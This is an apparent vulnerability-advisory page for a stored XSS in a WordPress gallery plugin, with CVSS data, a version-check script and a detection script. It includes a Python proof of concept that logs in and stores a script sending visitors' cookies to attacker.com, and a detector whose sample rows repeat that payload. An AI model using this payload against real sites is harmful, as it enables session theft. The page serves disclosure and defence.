Security Vulnerability Report
CVE-2025-13693 CVSS 6.4 MEDIUM

CVE-2025-13693

Published: 2025-12-21 04:16:05
Last Modified: 2026-04-15 00:35:42

Description

The Image Photo Gallery Final Tiles Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Custom scripts' setting in all versions up to, and including, 3.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

Why the Author role is the point: on a default single-site WordPress install only Administrators and Editors hold the unfiltered_html capability, so a setting that is meant to carry raw script has to be gated on that capability (or passed through wp_kses) before it is stored. Here an Author, who lacks the capability, can save script that is later emitted unescaped to every visitor of the gallery page; the script runs in the visitor's browser rather than in the plugin's own security authority, which is why the vector below carries S:C.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available in the NVD record (vulnStatus: Deferred). Affected versions:

Final Tiles Grid Gallery Lite < 3.6.9
Final Tiles Grid Gallery (Premium) < 3.6.9
Image Photo Gallery Final Tiles Grid plugin <= 3.6.8
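A triage helper added here as an example; it is not part of the advisory or of the plugin. It pulls the version out of a WordPress plugin file header ('Version:') or a readme.txt ('Stable tag:') and compares it against the 3.6.9 fix with tuple semantics, so '3.6', '3.6.8.1' and a '3.6.9-beta1' pre-release are handled correctly instead of being compared as strings. The plugin directory name final-tiles-grid-gallery-lite is taken from the trac links in the raw data; that readme.txt is served from wp-content/plugins/<slug>/readme.txt is the standard WordPress.org layout and is an assumption about any given install. The two header samples are constructed for the example.

```python
import re
import urllib.request
from typing import Optional, Tuple

# Fix version per the advisory ("< 3.6.9" is affected). The slug comes from the
# trac references; the readme.txt location is the standard layout (assumed).
FIXED_VERSION = (3, 6, 9)
PLUGIN_SLUG = "final-tiles-grid-gallery-lite"

# Constructed sample of a WordPress plugin header (not the plugin's real file)
SAMPLE_PLUGIN_HEADER = """<?php
/*
 * Plugin Name: Final Tiles Grid Gallery
 * Version: 3.6.8
 */
"""

# Constructed sample of a wordpress.org readme.txt (not the plugin's real file)
SAMPLE_README = """=== Final Tiles Grid Gallery ===
Requires at least: 5.0
Stable tag: 3.6.9
"""


def parse_version(version: str) -> Tuple[tuple, bool]:
    """'3.6.8' -> ((3, 6, 8), False); '3.6.9-beta1' -> ((3, 6, 9), True).
    Any trailing non-numeric text marks a pre-release."""
    m = re.match(r"\s*(\d+(?:\.\d+)*)(.*)", version)
    if not m:
        raise ValueError(f"not a version string: {version!r}")
    nums = tuple(int(p) for p in m.group(1).split("."))
    prerelease = bool(m.group(2).strip())
    return nums, prerelease


def is_affected(version: str) -> bool:
    """True for everything below the fix. Tuple ordering makes (3, 6) and
    (3, 6, 8, 1) sort below (3, 6, 9); a pre-release of 3.6.9 itself is
    treated as unfixed, since it predates the release that carries the fix."""
    nums, prerelease = parse_version(version)
    return nums < FIXED_VERSION or (nums == FIXED_VERSION and prerelease)


def version_from_header(text: str) -> Optional[str]:
    """Version from a plugin header ('Version:') or readme ('Stable tag:').
    Leading '*' and whitespace on the header line are tolerated."""
    m = re.search(r"^\s*\*?\s*(?:Version|Stable tag):\s*(\S+)", text, re.MULTILINE)
    return m.group(1) if m else None


def readme_version(site_url: str, timeout: float = 10.0) -> Optional[str]:
    """Fetch the publicly served readme.txt and return its Stable tag.
    Network access happens only when this is called explicitly."""
    url = f"{site_url.rstrip('/')}/wp-content/plugins/{PLUGIN_SLUG}/readme.txt"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return version_from_header(resp.read().decode("utf-8", "replace"))
    except (OSError, ValueError):
        return None


if __name__ == "__main__":
    for sample in (SAMPLE_PLUGIN_HEADER, SAMPLE_README):
        found = version_from_header(sample)
        state = "AFFECTED" if found and is_affected(found) else "patched"
        print(f"version {found}: {state}")
```

Note that the readme.txt Stable tag reflects the package that was uploaded, not necessarily what is installed; on a site you administer, `wp plugin list` or the plugin header in the installed directory is the authoritative source.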

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-13693 PoC - WordPress Final Tiles Grid Plugin Stored XSS
# Target: WordPress site with Final Tiles Grid plugin <= 3.6.8
#
# The admin page slug, the form field name 'custom_scripts' and the save
# button value below are the PoC's assumptions about the gallery edit form,
# and no nonce is sent; WordPress admin forms normally carry a _wpnonce that
# has to accompany the POST, so confirm the real field names against the
# edit form before relying on this.

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "author_user"
PASSWORD = "author_password"
GALLERY_ID = 1  # ID of a gallery the Author-level account is allowed to edit


def login_wordpress():
    """Log in to WordPress and return a session holding the auth cookies."""
    session = requests.Session()
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': f"{TARGET_URL}/wp-admin/",
        'testcookie': '1',
    }
    session.post(login_url, data=login_data)
    # A successful login sets a wordpress_logged_in_<hash> cookie
    if any(c.name.startswith('wordpress_logged_in') for c in session.cookies):
        return session
    return None


def exploit_stored_xss(session, gallery_id=GALLERY_ID):
    """Inject JavaScript via the gallery's 'Custom scripts' setting."""
    # XSS payload - exfiltrates the cookies of whoever views the gallery
    xss_payload = "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>"

    # Gallery edit form (admin page slug assumed by the PoC)
    update_url = (f"{TARGET_URL}/wp-admin/admin.php"
                  f"?page=final-tiles-gallery&action=edit&id={gallery_id}")

    post_data = {
        'custom_scripts': xss_payload,
        'save': 'Save Changes',
    }
    response = session.post(update_url, data=post_data)
    return response.ok


if __name__ == "__main__":
    session = login_wordpress()
    if session is None:
        print("[-] Authentication failed")
    elif exploit_stored_xss(session):
        print("[+] XSS payload submitted; visit the gallery page to trigger it")
    else:
        print("[-] Save request was rejected")
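The defender's counterpart, added here as an example and not taken from the advisory or the plugin: a hunt over stored 'Custom scripts' values for payloads like the one the PoC submits. Because the setting is designed to hold script, the presence of a `<script>` tag alone proves nothing; the two signals that matter are who stored the value (a role without unfiltered_html should never have been able to store executable markup) and what the script does (cookie access, outbound requests, inline event handlers, hosts other than the site's own). The plugin's real storage schema is not known, so the rows and their column names (id, author, author_role, custom_scripts) are constructed for the example and would have to be mapped onto the plugin's own table or options.

```python
import html
import re

# Roles holding the unfiltered_html capability on a default single-site
# WordPress install; anyone else should never have stored executable markup.
UNFILTERED_HTML_ROLES = {"administrator", "editor"}

# Markup that executes when rendered unescaped.
EXECUTABLE_MARKUP = r"<\s*script\b|\bon\w+\s*=|javascript\s*:"

# Tokens worth a second look even when the author was allowed to store script.
# Labels are ours; matching is case-insensitive. Expect some false positives
# (e.g. a legitimate img.onload = ... assignment) and review hits by hand.
SUSPICIOUS_PATTERNS = [
    (r"document\.cookie", "cookie access"),
    (r"\b(fetch|XMLHttpRequest|sendBeacon)\s*\(", "outbound request"),
    (r"\b(eval|atob|unescape)\s*\(", "decode/dynamic code"),
    (r"<\s*(iframe|object|embed)\b", "embedded frame/object"),
    (r"\bon\w+\s*=", "inline event handler"),
]

# Constructed sample rows (assumed schema; not the plugin's real table).
SAMPLE_ROWS = [
    {"id": 1, "author": "site_admin", "author_role": "administrator",
     "custom_scripts": "jQuery(function($){ $('.ftg').fadeIn(); });"},
    {"id": 2, "author": "author_user", "author_role": "author",
     "custom_scripts": "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>"},
    {"id": 3, "author": "author_user", "author_role": "author",
     "custom_scripts": "<img src=x onerror=alert(1)>"},
    {"id": 4, "author": "site_editor", "author_role": "editor",
     "custom_scripts": '<script src="https://cdn.example.net/lightbox.js"></script>'},
]


def normalise(value: str) -> str:
    """Undo one layer of HTML entity encoding and drop NUL bytes so that
    lightly obfuscated payloads still match the patterns."""
    return html.unescape(value).replace("\x00", "")


def assess(row: dict, site_host: str) -> list:
    """Return the reasons a stored 'Custom scripts' value deserves review
    (empty list when nothing stands out)."""
    text = normalise(row["custom_scripts"])
    reasons = []
    role = row["author_role"].lower()
    if role not in UNFILTERED_HTML_ROLES and re.search(EXECUTABLE_MARKUP, text, re.I):
        reasons.append(f"executable markup stored by role '{role}' (lacks unfiltered_html)")
    for pattern, label in SUSPICIOUS_PATTERNS:
        if re.search(pattern, text, re.I):
            reasons.append(label)
    for host in re.findall(r"https?://([^/\s'\"<>]+)", text, re.I):
        if host.lower() != site_host.lower():
            reasons.append(f"external host {host}")
    return reasons


def find_suspicious(rows: list, site_host: str) -> dict:
    """Map gallery id -> reasons for every row with at least one reason."""
    findings = {}
    for row in rows:
        reasons = assess(row, site_host)
        if reasons:
            findings[row["id"]] = reasons
    return findings


if __name__ == "__main__":
    for gallery_id, reasons in find_suspicious(SAMPLE_ROWS, "target-wordpress-site.com").items():
        print(f"gallery {gallery_id}: " + "; ".join(reasons))
```

Row 1 (an administrator's harmless jQuery) produces no finding, row 4 (an editor loading a script from a CDN) is surfaced only for the external host and is the kind of hit that needs a human decision, while rows 2 and 3 combine a role that lacks unfiltered_html with executable markup and are the ones to treat as exploitation of this CVE. After cleaning them up, rotate the cookies of anyone who viewed the affected galleries, since the PoC payload exfiltrates document.cookie.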

References

https://plugins.trac.wordpress.org/browser/final-tiles-grid-gallery-lite/tags/3.6.6/lib/gallery-class.php#L126
https://plugins.trac.wordpress.org/browser/final-tiles-grid-gallery-lite/trunk/lib/gallery-class.php#L126
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3418337%40final-tiles-grid-gallery-lite&new=3418337%40final-tiles-grid-gallery-lite&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/625d2b09-a6b9-4c0c-8c36-3c565e688aac?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13693", "sourceIdentifier": "[email protected]", "published": "2025-12-21T04:16:04.507", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Image Photo Gallery Final Tiles Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Custom scripts' setting in all versions up to, and including, 3.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/final-tiles-grid-gallery-lite/tags/3.6.6/lib/gallery-class.php#L126", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/final-tiles-grid-gallery-lite/trunk/lib/gallery-class.php#L126", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3418337%40final-tiles-grid-gallery-lite&new=3418337%40final-tiles-grid-gallery-lite&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/625d2b09-a6b9-4c0c-8c36-3c565e688aac?source=cve", "source": "[email protected]"}]}}